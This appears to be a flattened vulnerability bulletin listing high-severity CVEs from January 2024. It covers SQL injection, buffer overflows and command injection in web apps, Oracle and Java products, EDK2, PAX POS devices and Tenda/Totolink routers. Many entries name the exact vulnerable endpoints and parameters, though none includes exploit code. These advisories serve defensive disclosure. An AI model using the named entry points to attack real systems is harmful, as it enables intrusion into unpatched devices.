online_faculty_clearance_system -- online_faculty_clearance_systemA vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567.2024-01-129.8CVE-2024-0462
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
online_faculty_clearance_system -- online_faculty_clearance_systemA vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /production/admin_view_info.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250568.2024-01-129.8CVE-2024-0463
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
oracle -- enterprise_managerVulnerability in the Oracle Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Event Management). The supported version that is affected is 13.5.0.0. Easily exploitable vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the Oracle Enterprise Manager Base Platform executes to compromise Oracle Enterprise Manager Base Platform. While the vulnerability is in Oracle Enterprise Manager Base Platform, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Manager Base Platform accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Manager Base Platform accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Manager Base Platform. CVSS 3.1 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L).2024-01-168.3CVE-2024-20916
secalert_us@oracle.com
oracle_corporation -- audit_vault_and_database_firewallVulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Audit Vault and Database Firewall. CVSS 3.1 Base Score 7.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).2024-01-167.6CVE-2024-20924
secalert_us@oracle.com
oracle_corporation -- financial_services_analytical_applications_infrastructureVulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.7, 8.0.8, 8.0.9, 8.1.0, 8.1.1 and 8.1.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized read access to a subset of Oracle Financial Services Analytical Applications Infrastructure accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 7.4 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L).2024-01-167.4CVE-2023-21901
secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jreVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).2024-01-167.4CVE-2024-20918
secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jreVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 17.0.9; Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).2024-01-167.5CVE-2024-20932
secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jreVulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).2024-01-167.4CVE-2024-20952
secalert_us@oracle.com
oretnom23 -- budget_and_expense_tracker_systemBudget and Expense Tracker System v1.0 is vulnerable to SQL Injection via /expense_budget/admin/?page=reports/budget&date_start=2023-12-28&date_end=2024-01-167.2CVE-2024-22628
cve@mitre.org
oretnom23 -- house_rental_management_systemA vulnerability was found in SourceCodester House Rental Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file manage_user.php of the component Edit User. The manipulation of the argument id/name/username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250610 is the identifier assigned to this vulnerability.2024-01-137.2CVE-2024-0502
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
paxtechnology -- paydroidPAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow the execution of arbitrary commands with system account privilege by shell injection starting with a specific word. The attacker must have shell access to the device in order to exploit this vulnerability.2024-01-157.8CVE-2023-42136
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
paxtechnology -- paydroidPAX Android based POS devices with PayDroid_8.1.0_Sagittarius_V11.1.50_20230614 or earlier can allow for command execution with high privileges by using malicious symlinks. The attacker must have shell access to the device in order to exploit this vulnerability.2024-01-157.8CVE-2023-42137
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
paxtechnology -- paydroidPAX A920 device allows to downgrade bootloader due to a bug in its version check. The signature is correctly checked and only bootloader signed by PAX can be used. The attacker must have physical USB access to the device in order to exploit this vulnerability.2024-01-157.6CVE-2023-4818
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
phpgurukul -- blood_bank_\&_donor_management_systemA vulnerability has been found in Blood Bank & Donor Management 5.6 and classified as critical. This vulnerability affects unknown code of the file /admin/request-received-bydonar.php. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250564.2024-01-127.2CVE-2024-0459
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul -- company_visitor_management_systemA vulnerability was found in PHPGurukul Company Visitor Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search-visitor.php. The manipulation leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251377 was assigned to this vulnerability.2024-01-187.2CVE-2024-0651
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
pivotal -- cloud_foundry_deploymentCloud Foundry routing release versions from v0.163.0 to v0.283.0 are vulnerable to a DOS attack. An unauthenticated attacker can use this vulnerability to force route pruning and therefore degrade the service availability of the Cloud Foundry deployment.2024-01-127.5CVE-2023-34061
security@vmware.com
progress_software_corporation -- moveit_transferIn Progress MOVEit Transfer versions released before 2022.0.10 (14.0.10), 2022.1.11 (14.1.11), 2023.0.8 (15.0.8), 2023.1.3 (15.1.3), an input validation issue was discovered. An authenticated user can manipulate a parameter in an HTTPS transaction. The modified transaction could lead to computational errors within MOVEit Transfer and potentially result in a denial of service.2024-01-177.1CVE-2024-0396
security@progress.com
security@progress.com
progress_software_corporation -- openedgeThis issue affects Progress Application Server (PAS) for OpenEdge in versions 11.7 prior to 11.7.18, 12.2 prior to 12.2.13, and innovation releases prior to 12.8.0. An attacker can formulate a request for a WEB transport that allows unintended file uploads to a server directory path on the system running PASOE. If the upload contains a payload that can further exploit the server or its network, the launch of a larger scale attack may be possible.2024-01-189.1CVE-2023-40051
security@progress.com
security@progress.com
progress_software_corporation -- openedgeThis issue affects Progress Application Server (PAS) for OpenEdge in versions 11.7 prior to 11.7.18, 12.2 prior to 12.2.13, and innovation releases prior to 12.8.0. An attacker who can produce a malformed web request may cause the crash of a PASOE agent potentially disrupting the thread activities of many web application clients. Multiple of these DoS attacks could lead to the flooding of invalid requests as compared to the server's remaining ability to process valid requests.2024-01-187.5CVE-2023-40052
security@progress.com
security@progress.com
pyload -- pyloadpyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.2024-01-189.6CVE-2024-22416
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
qstar -- archive_storage_managerQStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based Reflected Cross Site Scripting (XSS) vulnerability within the component qnme-ajax?method=tree_level.2024-01-138.8CVE-2023-51063
cve@mitre.org
qstar -- archive_storage_managerAn authenticated remote code execution vulnerability in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows attackers to arbitrarily execute commands.2024-01-138.8CVE-2023-51066
cve@mitre.org
qstar -- archive_storage_managerIncorrect access control in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to obtain system backups and other sensitive information from the QStar Server.2024-01-137.5CVE-2023-51065
cve@mitre.org
qstar -- archive_storage_managerAn access control issue in QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 allows unauthenticated attackers to arbitrarily adjust sensitive SMB settings on the QStar Server.2024-01-137.5CVE-2023-51070
cve@mitre.org
rogierlankhorst -- burst_statistics_privacy-friendly_analytics_for_wordpressThe Burst Statistics - Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the /wp-json/burst/v1/data/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database.2024-01-177.2CVE-2024-0405
security@wordfence.com
security@wordfence.com
security@wordfence.com
security@wordfence.com
shopware -- shopwareShopware is an open headless commerce platform. The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The 'name' field in this "aggregations" object is vulnerable SQL-injection and can be exploited using time-based SQL-queries. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.2024-01-169.3CVE-2024-22406
security-advisories@github.com
shopware -- shopwareShopware is an open headless commerce platform. The implemented Flow Builder functionality in the Shopware application does not adequately validate the URL used when creating the "call webhook" action. This enables malicious users to perform web requests to internal hosts. This issue has been fixed in the Commercial Plugin release 6.5.7.4 or with the Security Plugin. For installations with Shopware 6.4 the Security plugin is recommended to be installed and up to date. For older versions of 6.4 and 6.5 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.2024-01-167.6CVE-2024-22408
security-advisories@github.com
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to transmission of authentication credentials in plaintext over the network. A remote attacker could exploit this vulnerability by eavesdropping on the victim's network traffic to extract username and password from the web interface (Login Page) of the vulnerable targeted system.2024-01-177.5CVE-2023-51740
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to transmission of authentication credentials in plaintext over the network. A remote attacker could exploit this vulnerability by eavesdropping on the victim's network traffic to extract username and password from the web interface (Password Reset Page) of the vulnerable targeted system.2024-01-177.5CVE-2023-51741
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Add Downstream Frequency parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform a Denial of Service (DoS) attack on the targeted system.2024-01-177.5CVE-2023-51742
vdisclose@cert-in.org.in
skyworthdigital -- cm5100_firmwareThis vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Set Upstream Channel ID (UCID) parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform a Denial of Service (DoS) attack on the targeted system.2024-01-177.5CVE-2023-51743
vdisclose@cert-in.org.in
spider-themes -- eazydocsThe EazyDocs WordPress plugin before 2.3.6 does not have authorization and CSRF checks when handling documents and does not ensure that they are documents from the plugin, allowing unauthenticated users to delete arbitrary posts, as well as add and delete documents/sections.2024-01-157.5CVE-2023-6029
contact@wpscan.com
taokeyun-- taokeyunA vulnerability was found in Taokeyun up to 1.0.5. It has been classified as critical. Affected is the function login of the file application/index/controller/m/User.php of the component HTTP POST Request Handler. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250584.2024-01-137.3CVE-2024-0479
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
taokeyun-- taokeyunA vulnerability was found in Taokeyun up to 1.0.5. It has been declared as critical. Affected by this vulnerability is the function index of the file application/index/controller/m/Drs.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250585 was assigned to this vulnerability.2024-01-137.3CVE-2024-0480
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- a15_firmwareA vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-157.2CVE-2024-0531
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- a15_firmwareA vulnerability was found in Tenda A15 15.13.07.13. It has been declared as critical. This vulnerability affects unknown code of the file /goform/WifiExtraSet of the component Web-based Management Interface. The manipulation of the argument wpapsk_crypto2_4g leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250702 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-157.2CVE-2024-0532
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- a15_firmwareA vulnerability was found in Tenda A15 15.13.07.13. It has been rated as critical. This issue affects some unknown processing of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250703. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-157.2CVE-2024-0533
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- a15_firmwareA vulnerability classified as critical has been found in Tenda A15 15.13.07.13. Affected is an unknown function of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250704. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-157.2CVE-2024-0534
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- pa6A vulnerability classified as critical was found in Tenda PA6 1.0.1.21. Affected by this vulnerability is the function cgiPortMapAdd of the file /portmap of the component httpd. The manipulation of the argument groupName leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250705 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-158.8CVE-2024-0535
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- w9_firmwareA vulnerability, which was classified as critical, has been found in Tenda W9 1.0.0.7(4456). Affected by this issue is the function setWrlAccessList of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250706 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0536
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- w9_firmwareA vulnerability, which was classified as critical, was found in Tenda W9 1.0.0.7(4456). This affects the function setWrlBasicInfo of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0537
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- w9_firmwareA vulnerability has been found in Tenda W9 1.0.0.7(4456) and classified as critical. This vulnerability affects the function formQosManage_auto of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0538
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- w9_firmwareA vulnerability was found in Tenda W9 1.0.0.7(4456) and classified as critical. This issue affects the function formQosManage_user of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0539
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- w9_firmwareA vulnerability was found in Tenda W9 1.0.0.7(4456). It has been classified as critical. Affected is the function formOfflineSet of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0540
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- w9_firmwareA vulnerability was found in Tenda W9 1.0.0.7(4456). It has been declared as critical. Affected by this vulnerability is the function formAddSysLogRule of the component httpd. The manipulation of the argument sysRulenEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250711. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0541
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tenda -- w9_firmwareA vulnerability was found in Tenda W9 1.0.0.7(4456). It has been rated as critical. Affected by this issue is the function formWifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250712. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-159.8CVE-2024-0542
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
themely -- theme_demo_importTheme Demo Import WordPress plugin before 1.1.1 does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) even when FILE_MODS and FILE_EDIT are disallowed.2024-01-167.2CVE-2022-1538
contact@wpscan.com
tianocore -- edk2EDK2's Network Package is susceptible to a buffer overflow vulnerability via a long server ID option in DHCPv6 client. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.2024-01-168.3CVE-2023-45230
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to a buffer overflow vulnerability when processing DNS Servers option from a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.2024-01-168.3CVE-2023-45234
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to a buffer overflow vulnerability when handling Server ID option from a DHCPv6 proxy Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality, Integrity and/or Availability.2024-01-168.3CVE-2023-45235
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to an infinite loop vulnerability when parsing unknown options in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability.2024-01-167.5CVE-2023-45232
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to an infinite lop vulnerability when parsing a PadN option in the Destination Options header of IPv6. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Availability.2024-01-167.5CVE-2023-45233
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
totolink -- ex1800t_firmwareTOTOlink EX1800T V9.1.0cu.2112_B20220316 was discovered to contain a remote command execution (RCE) vulnerability via the telnet_enabled parameter of the setTelnetCfg interface2024-01-129.8CVE-2023-52026
cve@mitre.org
totolink -- lr1200gb_firmwareA vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. This issue affects the function setSmsCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument text leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0571
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- lr1200gb_firmwareA vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0572
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- lr1200gb_firmwareA vulnerability has been found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this vulnerability is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250789 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0573
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- lr1200gb_firmwareA vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this issue is the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250790 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0574
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- lr1200gb_firmwareA vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been classified as critical. This affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250791. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0575
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- lr1200gb_firmwareA vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been declared as critical. This vulnerability affects the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sPort leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250792. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0576
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- lr1200gb_firmwareA vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250793 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0577
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- lr1200gb_firmwareA vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument File leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250794 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0578
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- n350rtA vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.2024-01-167.3CVE-2024-0570
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- x2000r_firmwareA vulnerability classified as critical was found in Totolink X2000R 1.0.0-B20221212.1452. Affected by this vulnerability is the function formMapDelDevice of the file /boafrm/formMapDelDevice. The manipulation of the argument macstr leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250795. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-169.8CVE-2024-0579
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
totolink -- x6000r_firmwareAn issue discovered in TOTOLINK X6000R V9.4.0cu.852_B20230719 allows attackers to run arbitrary code via the sub_410118 function of the shttpd program.2024-01-169.8CVE-2023-52041
cve@mitre.org
totolink -- x6000r_firmwareAn issue discovered in sub_4117F8 function in TOTOLINK X6000R V9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the 'lang' parameter.2024-01-169.8CVE-2023-52042
cve@mitre.org
